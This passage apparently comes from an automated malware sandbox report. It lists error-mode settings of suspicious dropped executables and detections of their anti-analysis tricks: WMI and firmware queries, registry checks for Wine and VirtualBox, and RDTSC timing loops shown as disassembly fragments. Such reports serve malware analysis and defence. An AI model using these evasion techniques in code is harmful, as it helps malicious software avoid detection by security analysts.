                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Query firmware table information (likely to detect VMs)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSystem information queried: FirmwareTableInformationJump to behavior
                              Source: C:\Windows\SysWOW64\explorer.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSystem information queried: FirmwareTableInformation
                              Switches to a custom stack to bypass stack traces
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679364
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679364
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679065
                              Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C673B54
                              Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 27A317
                              Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 32B1145
                              Tries to detect sandboxes / dynamic malware analysis system (registry check)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Tries to detect virtualization through RDTSC time measurements
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 50310B second address: 50310F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 50310F second address: 503114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67B114 second address: 67B11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67B11A second address: 67B11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3CA second address: 68A3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3D5 second address: 68A3DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3DD second address: 68A3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FD3A47FEE86h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A845 second address: 68A866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A866 second address: 68A86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A86A second address: 68A86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A86E second address: 68A877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A877 second address: 68A87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D35A second address: 68D3A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c call 00007FD3A47FEE93h 0x00000011 mov dx, ax 0x00000014 pop ecx 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D19F3h] 0x0000001d clc 0x0000001e call 00007FD3A47FEE89h 0x00000023 pushad 0x00000024 jmp 00007FD3A47FEE8Eh 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3A2 second address: 68D3B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FD3A4D6CB98h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3B8 second address: 68D3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD3A47FEE96h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ecx 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD3A47FEE8Bh 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3FF second address: 68D405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D405 second address: 68D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D546 second address: 68D56F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3A4D6CB98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FD3A4D6CBA6h 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D56F second address: 68D575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D575 second address: 68D579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D579 second address: 68D58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D58B second address: 68D58F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D58F second address: 68D595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D595 second address: 68D5C7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FD3A4D6CB96h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f jmp 00007FD3A4D6CBA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D5C7 second address: 68D5CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D5CD second address: 68D676 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD3A4D6CB9Bh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c call 00007FD3A4D6CBA9h 0x00000011 jmp 00007FD3A4D6CBA9h 0x00000016 pop edi 0x00000017 push 00000003h 0x00000019 jmp 00007FD3A4D6CB9Fh 0x0000001e push 00000000h 0x00000020 mov si, 822Ch 0x00000024 push 00000003h 0x00000026 or dword ptr [ebp+122D228Ah], ecx 0x0000002c call 00007FD3A4D6CB99h 0x00000031 jmp 00007FD3A4D6CBA7h 0x00000036 push eax 0x00000037 push ebx 0x00000038 jmp 00007FD3A4D6CBA5h 0x0000003d pop ebx 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jng 00007FD3A4D6CB96h 0x0000004b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D676 second address: 68D692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D692 second address: 68D69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D69F second address: 68D6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A47FEE8Eh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FD3A47FEE8Fh 0x00000015 pop eax 0x00000016 je 00007FD3A47FEE8Eh 0x0000001c pushad 0x0000001d sub dword ptr [ebp+122D1C0Eh], esi 0x00000023 popad 0x00000024 lea ebx, dword ptr [ebp+1245E25Fh] 0x0000002a mov esi, dword ptr [ebp+122D3801h] 0x00000030 push eax 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67CC22 second address: 67CC2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3A4D6CB96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67CC2E second address: 67CC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ABD5C second address: 6ABD80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d jnp 00007FD3A4D6CB98h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
